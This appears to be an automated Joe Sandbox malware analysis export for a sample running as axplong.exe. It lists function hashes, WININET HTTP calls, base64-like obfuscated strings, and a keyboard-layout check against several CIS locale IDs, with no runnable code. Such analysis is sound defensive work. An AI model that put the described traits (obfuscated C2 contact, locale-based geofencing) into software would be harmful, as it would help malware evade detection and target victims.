Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1637a33abde25daf52d2ace89857a8b29cbb7f68369d0b5bcff0ac79904ea92b
Instruction ID: f8a072173aa204c86d5232adf8f6255037ffd1213402dfa00935f865218f9efb
Opcode Fuzzy Hash: 1637a33abde25daf52d2ace89857a8b29cbb7f68369d0b5bcff0ac79904ea92b
Instruction Fuzzy Hash: CD2190BB14C129BF7242D5856B689FA6B2FE1D7730330C527FC0BD5502E2854ACB227A

Function 0541031F Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782b4a65faf8194c8804425d5830a70411a544e4e82380da8b9d656ee150f390
Instruction ID: eee5a3d40f5cb2f3feed4e18384f6071ac044929acc722742b45dc34c0c9ebc0
Opcode Fuzzy Hash: 782b4a65faf8194c8804425d5830a70411a544e4e82380da8b9d656ee150f390
Instruction Fuzzy Hash: 2A1160BB14C128BF6242D5816B58AF6672FE1D7770334C527FC0BD5502D2854ADB227A

Function 05410362 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2ce5e697e7be86f9772f4cd355031cbcedec49de63cd36616d7cca0e5df746
Instruction ID: 69b5887910489b2dc66615c44d239a38a66a114ffca8c9c07bb5fad70a706cd1
Opcode Fuzzy Hash: 6a2ce5e697e7be86f9772f4cd355031cbcedec49de63cd36616d7cca0e5df746
Instruction Fuzzy Hash: 2A1148BB14C129BF7242D5826B68AFA672FE1D6330330C527FC0BC5502D2854ADB217A

Function 0541036F Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfb787390e94247df7865bea047f3d4587ab85b10ce33ceaeeea196aac4a63cc
Instruction ID: ad02462e1eeaeacb86a3eff757fd8ce663992881f88b1490bb3319d01d7b1cb4
Opcode Fuzzy Hash: dfb787390e94247df7865bea047f3d4587ab85b10ce33ceaeeea196aac4a63cc
Instruction Fuzzy Hash: D511A0BB14C128BFB242C5826B589FA672FE1D6330330C827FC4BD5502D2858ADF2279

Function 05410382 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e4a238094388da3fdd60c3ab9ca48d759fb136486ad240d50c4fa13b7858ae4
Instruction ID: d7585e639883b2516dbd5ac88f545a002b24ce83732e2ade41be0038b16490cc
Opcode Fuzzy Hash: 5e4a238094388da3fdd60c3ab9ca48d759fb136486ad240d50c4fa13b7858ae4
Instruction Fuzzy Hash: 54113CFB14C119BF7202D5826B58AFA672FE2D6730330C427FC0BD5502D2954A9F217A

Function 05410395 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a3f5186ab862efb108e7bb662d59d000a590d84bf9165e4d37f7ca2dd3f5e3
Instruction ID: c32db8310c85e8848d8a259fbd3413b7aea4a2a6b60b174be0558e0da9bb0207
Opcode Fuzzy Hash: c6a3f5186ab862efb108e7bb662d59d000a590d84bf9165e4d37f7ca2dd3f5e3
Instruction Fuzzy Hash: A5119EBA10C155BFB602C6816F58AFA676ED6C6730730C827FC4AC5043C2994A8B623A

Function 054103D1 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7cbf15ea23f667ff93f75726d94f269255f84275a27e320aeddb5542d1498a0
Instruction ID: 9a87d8305cf6159a4ab3e5238049014c57805a1ad45e83a02d4c64de3a725100
Opcode Fuzzy Hash: d7cbf15ea23f667ff93f75726d94f269255f84275a27e320aeddb5542d1498a0
Instruction Fuzzy Hash: BF0128FB20C121BE7241D4823FA8AFA676ED1D6731330C42BF84AC4006D2894ECF613A

Function 054103C0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52dcfcb855aa053453dfcbeb30c94fbf03136a6c0029be9fa60577941f265a09
Instruction ID: a77229e21c5ecd486825a9b40f8054d4ea8b7d51a290d25d8b970540563c15db
Opcode Fuzzy Hash: 52dcfcb855aa053453dfcbeb30c94fbf03136a6c0029be9fa60577941f265a09
Instruction Fuzzy Hash: 92012CBB10C115BF7241D9817F98DFA676ED2C5730730C82BFC4AD5005D2954A9B6639

Function 05410430 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea82bb0cc83f9f1a989af99eab3e3ea18f250a9cd4cf7f4e129eb18a8c7aaad6
Instruction ID: 49a51d33afe71fac9f2bf310a5f04cf272ff3ea5811a6596ad8973d6ea2bf15d
Opcode Fuzzy Hash: ea82bb0cc83f9f1a989af99eab3e3ea18f250a9cd4cf7f4e129eb18a8c7aaad6
Instruction Fuzzy Hash: 0A018FB724C126AF7641D8927B98AFA671AD0D5730331C82BF84AC4011D2458DCB623D

Function 054103F2 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25588f98e248e2097beebc5d02bcf56bd0f470293ced6a335e1ea3f3b9df7d7
Instruction ID: 45adca92374a28275149aa8fcd02d2a6c87f5b5f63921fed1946bf60434b7c58
Opcode Fuzzy Hash: a25588f98e248e2097beebc5d02bcf56bd0f470293ced6a335e1ea3f3b9df7d7
Instruction Fuzzy Hash: 8BF04FBB20C111BE7240D4827B98AFA676ED1D5730331C82BF84AC4005E245898B2179

Function 05410410 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d601f59dd2f2cfb173c8397aabecbfa94d6c2f27117947dbefe88d05bab6c5
Instruction ID: 8028e9ba48cacee96849dab34554aec0558c8867fa000ca9d9348215c12fd124
Opcode Fuzzy Hash: e4d601f59dd2f2cfb173c8397aabecbfa94d6c2f27117947dbefe88d05bab6c5
Instruction Fuzzy Hash: 8EF012BB20D1216E7241D4823B98AFB636EC1D5731331C827F84AC0005D1894ACF6139

Function 0541041C Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2057492601.0000000005410000.00000040.00001000.00020000.00000000.sdmp, Offset: 05410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5410000_hsRju5CPK2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cc3116fdd475823185070f6bbe2408419c0df8e2868b9845579990238d59f84
Instruction ID: bf92f30abdc791fd93a94f8eb6a2bce3a01dcb4b72b5537e753ed07dda381546
Opcode Fuzzy Hash: 2cc3116fdd475823185070f6bbe2408419c0df8e2868b9845579990238d59f84
Instruction Fuzzy Hash: 02F0C0FB20C1256E7141E4823B98AFB676ED1D5731331C82BF84AC1105D1994A9F623A

Analysis Process: axplong.exePID: 6024, Parent PID: 6348COMMON

Execution Graph

Execution Coverage:	9.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.3%
Total number of Nodes:	1899
Total number of Limit Nodes:	31

Executed Functions

Function 00CFBD30 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(00D48D18,00000000,00000000,00000000,00000000), ref: 00CFBDBC
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CFBDE1
HttpOpenRequestA.WININET(?,00000000), ref: 00CFBE2A
HttpSendRequestA.WININET(?,00000000), ref: 00CFBEEA
InternetReadFile.WININET(?,?,000003FF,?), ref: 00CFBF9C
InternetCloseHandle.WININET(?), ref: 00CFC077
InternetCloseHandle.WININET(?), ref: 00CFC07F
InternetCloseHandle.WININET(?), ref: 00CFC087

Strings

9wGTaLGWQy9=, xrefs: 00CFC355
StYMTE==, xrefs: 00CFBE03
SbKm, xrefs: 00CFD4E6
9wGTaHilQw==, xrefs: 00CFC2BB, 00CFC513
stoi argument out of range, xrefs: 00CFE3CA
invalid stoi argument, xrefs: 00CFE3D4

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 9wGTaHilQw==$9wGTaLGWQy9=$SbKm$StYMTE==$invalid stoi argument$stoi argument out of range
API String ID: 688256393-230317815
Opcode ID: 16de953cfa7c485a9ed847a6b917d54a05d59155a37f8b01962e7da542f585eb
Instruction ID: e26cae97d11f3c3795bc1843f28f0326b40d7fff85e98f59f0fc7dcc42ebae6e
Opcode Fuzzy Hash: 16de953cfa7c485a9ed847a6b917d54a05d59155a37f8b01962e7da542f585eb
Instruction Fuzzy Hash: 45B1C3B1A0011C9BDB28CF28CD85BAEBB75EF41304F5041A9FA19972D1D7719AC4CFA5

Function 00CFE410 Relevance: 13.5, Strings: 10, Instructions: 1000
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XIt=, xrefs: 00D0085D
Xst=, xrefs: 00CFF5FD, 00CFF8DA
NvB+, xrefs: 00CFE704
246122658369, xrefs: 00CFF617, 00CFF8F4, 00D004C7, 00D0087A
111, xrefs: 00CFF680
e76b71, xrefs: 00CFFA6E
XIp=, xrefs: 00D004AA
NF==, xrefs: 00CFE475
Vp==, xrefs: 00CFE9EF, 00CFEC36
HcKn91KZ, xrefs: 00CFE44F

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 111$246122658369$HcKn91KZ$NF==$NvB+$Vp==$XIp=$XIt=$Xst=$e76b71
API String ID: 0-788600999
Opcode ID: 7555b907a87e5e2b90652a3df2b7015140e12ce233ca153b322b9b1b97bba6c6
Instruction ID: 4d32ce3b88b5e9f5922e9776130c4707892cb1d9fc7fa5e220d48c3d01eaee8c
Opcode Fuzzy Hash: 7555b907a87e5e2b90652a3df2b7015140e12ce233ca153b322b9b1b97bba6c6
Instruction Fuzzy Hash: 1D82B570A0424C9BEF14DF68C9497DE7FB5EF46304F508198E9046B3C6C7B59A88CBA2

Function 00D0D2E8 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00CF23BE

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: 14ef0d3f8d46fdc5b629d5b26dd7289cb257d2def14484b0f09b18f46631c885
Instruction ID: 9a8cf64b25a37a6bb231ba0e806adbe06728b6d14d988f15ac6b3786255a2d97
Opcode Fuzzy Hash: 14ef0d3f8d46fdc5b629d5b26dd7289cb257d2def14484b0f09b18f46631c885
Instruction Fuzzy Hash: E8517DB1901705CBDB16CF98E8917AAB7F6FB18321F28852AD819EB294D3749944CF70

Function 00D03520 Relevance: 51.5, APIs: 1, Strings: 28, Instructions: 761
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00D0422F

Part of subcall function 00D07840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00D0792C
Part of subcall function 00D07840: __Cnd_destroy_in_situ.LIBCPMT ref: 00D07938
Part of subcall function 00D07840: __Mtx_destroy_in_situ.LIBCPMT ref: 00D07941

Strings

246122658369, xrefs: 00D01E75, 00D027BE, 00D02A13, 00D02A80, 00D02E58, 00D03343, 00D033A4, 00D04F0A, 00D04F1D, 00D04F5F, 00D04F69, 00D054C4
a9P=, xrefs: 00D06353
WRQd, xrefs: 00D03D90
R2Z, xrefs: 00D052ED
WMNZ, xrefs: 00D0534A
", xrefs: 00D03E69
NvF+, xrefs: 00D0478D, 00D048BC, 00D04AAC, 00D04BDB
bcBZ, xrefs: 00D054AB
XM7e, xrefs: 00D03ABE
Xvml, xrefs: 00D03BA9
WMxZ, xrefs: 00D053EE
NvB+, xrefs: 00D04746, 00D047BD, 00D04A65, 00D04ADC
Inhk, xrefs: 00D0375F
LrTsKE==, xrefs: 00D05489
avBZ, xrefs: 00D053C5
Wb Z, xrefs: 00D05417
wNZ, xrefs: 00D05321
aRFZ, xrefs: 00D05467
invalid stoi argument, xrefs: 00D02DB9, 00D02DC8, 00D0422A, 00D04E6D
aSF2aA==, xrefs: 00D046E2
XvPZ, xrefs: 00D05373
Gl==, xrefs: 00D0366E, 00D04CFD
5120, xrefs: 00D03A8F, 00D03B7A
9LFZ, xrefs: 00D054D2
e76b71, xrefs: 00D05459
bLTZ, xrefs: 00D0539C
stoi argument out of range, xrefs: 00D02DD2, 00D02DF0, 00D04239, 00D04E7C
SBZ, xrefs: 00D05440

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
String ID: R2Z$ SBZ$ wNZ$"$246122658369$5120$9LFZ$Gl==$Inhk$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$WRQd$Wb Z$XM7e$XvPZ$Xvml$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$invalid stoi argument$stoi argument out of range
API String ID: 4234742559-736024444
Opcode ID: 9ddb2547a48b0ffe8a61b756d04dc7087604a89fc9cbcfe110175254bec23c16
Instruction ID: a6196f7fcbc46c1490670446282bd020eacc63733aa183627b731e62cf1ae2bd
Opcode Fuzzy Hash: 9ddb2547a48b0ffe8a61b756d04dc7087604a89fc9cbcfe110175254bec23c16
Instruction Fuzzy Hash: DC52C771E002489BDF18EB78CD4AB9D7BB5EF45304F54819CE448AB2C2D7759A84CBB2

Function 00D04690 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON

Download Yara Rule

APIs

Part of subcall function 00D07840: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00D0792C
Part of subcall function 00D07840: __Cnd_destroy_in_situ.LIBCPMT ref: 00D07938
Part of subcall function 00D07840: __Mtx_destroy_in_situ.LIBCPMT ref: 00D07941

Part of subcall function 00CFBD30: InternetOpenW.WININET(00D48D18,00000000,00000000,00000000,00000000), ref: 00CFBDBC
Part of subcall function 00CFBD30: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00CFBDE1
Part of subcall function 00CFBD30: HttpOpenRequestA.WININET(?,00000000), ref: 00CFBE2A

std::_Xinvalid_argument.LIBCPMT ref: 00D04E72

Strings

avBZ, xrefs: 00D053C5
Wb Z, xrefs: 00D05417
246122658369, xrefs: 00D04F0A, 00D04F1D, 00D04F5F, 00D04F69, 00D054C4
a9P=, xrefs: 00D06353, 00D06622
wNZ, xrefs: 00D05321
aRFZ, xrefs: 00D05467
R2Z, xrefs: 00D052ED
WMNZ, xrefs: 00D0534A
aSF2aA==, xrefs: 00D046E2
XvPZ, xrefs: 00D05373
NvF+, xrefs: 00D0478D, 00D048BC, 00D04AAC, 00D04BDB
Gl==, xrefs: 00D0366E, 00D04CFD
bcBZ, xrefs: 00D054AB
9LFZ, xrefs: 00D054D2
WMxZ, xrefs: 00D053EE
NvB+, xrefs: 00D04746, 00D047BD, 00D04A65, 00D04ADC
LrTsKE==, xrefs: 00D05489
e76b71, xrefs: 00D05459
bLTZ, xrefs: 00D0539C
stoi argument out of range, xrefs: 00D04239, 00D04E7C
SBZ, xrefs: 00D05440

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
String ID: R2Z$ SBZ$ wNZ$246122658369$9LFZ$Gl==$LrTsKE==$NvB+$NvF+$WMNZ$WMxZ$Wb Z$XvPZ$a9P=$aRFZ$aSF2aA==$avBZ$bLTZ$bcBZ$e76b71$stoi argument out of range
API String ID: 2414744145-383584070
Opcode ID: c19983254ac586bb987089c8a9b0c4bf00f2f9e3823691e76844810db14479f8
Instruction ID: da740db84dfcffc9e5086152d47e93502faacb98449a4450f56bfc168944878e
Opcode Fuzzy Hash: c19983254ac586bb987089c8a9b0c4bf00f2f9e3823691e76844810db14479f8
Instruction Fuzzy Hash: 06230271E002588BEB19DB28CD8979DBBB69B81304F5481DCE44CAB2C6DB759F848F71

Function 00CF5DD0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00CF5FEA
00000419, xrefs: 00CF5F88
0000043f, xrefs: 00CF601B
Keyboard Layout\Preload, xrefs: 00CF5F44
00000422, xrefs: 00CF5FB9

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4490985473.0000000001010000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491690660.00000000011AF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4491822705.00000000011B1000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cf0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: c79e821e9ed3399cf081ef83915c6be7124444c66d242d679d26e1e996fd603a
Instruction ID: 0f4eb3fa1ac09271fbdea395fe105d19a32e419eec415fb5c2000372eae6e6de
Opcode Fuzzy Hash: c79e821e9ed3399cf081ef83915c6be7124444c66d242d679d26e1e996fd603a
Instruction Fuzzy Hash: 37E1AF7190021CABDB24DBA4CC89BEEBB79EB15304F5042D9E509A7291DB749FC4CF62

Function 00CF7CE0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00CF7E83

Strings

K9pqMU==, xrefs: 00CF8042
K9prKk==, xrefs: 00CF80EA
K9pqLk==, xrefs: 00CF8192

Memory Dump Source

Source File: 00000002.00000002.4489470603.0000000000CF1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00CF0000, based on PE: true

Associated: 00000002.00000002.4489382368.0000000000CF0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489470603.0000000000D52000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489747352.0000000000D59000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000D5B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000EE9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FCC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000000FF8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.0000000001001000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.4489830566.000000000100F000.00000040.00000001.01000000.00000007.sdmpDownload File
